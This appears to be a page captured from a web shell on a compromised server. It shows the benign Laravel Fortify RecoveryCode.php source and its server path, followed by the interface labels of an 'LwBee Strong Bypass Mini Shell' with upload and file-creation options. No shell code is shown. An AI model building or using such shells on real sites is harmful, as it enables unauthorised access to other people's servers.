/home/storage/f/3f/a5/aloic1/public_html/core/vendor/laravel/fortify/src/RecoveryCode.php
<?php

namespace Laravel\Fortify;

use Illuminate\Support\Str;

class RecoveryCode
{
    /**
     * Generate a new recovery code.
     *
     * @return string
     */
    public static function generate()
    {
        return Str::random(10).'-'.Str::random(10);
    }
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File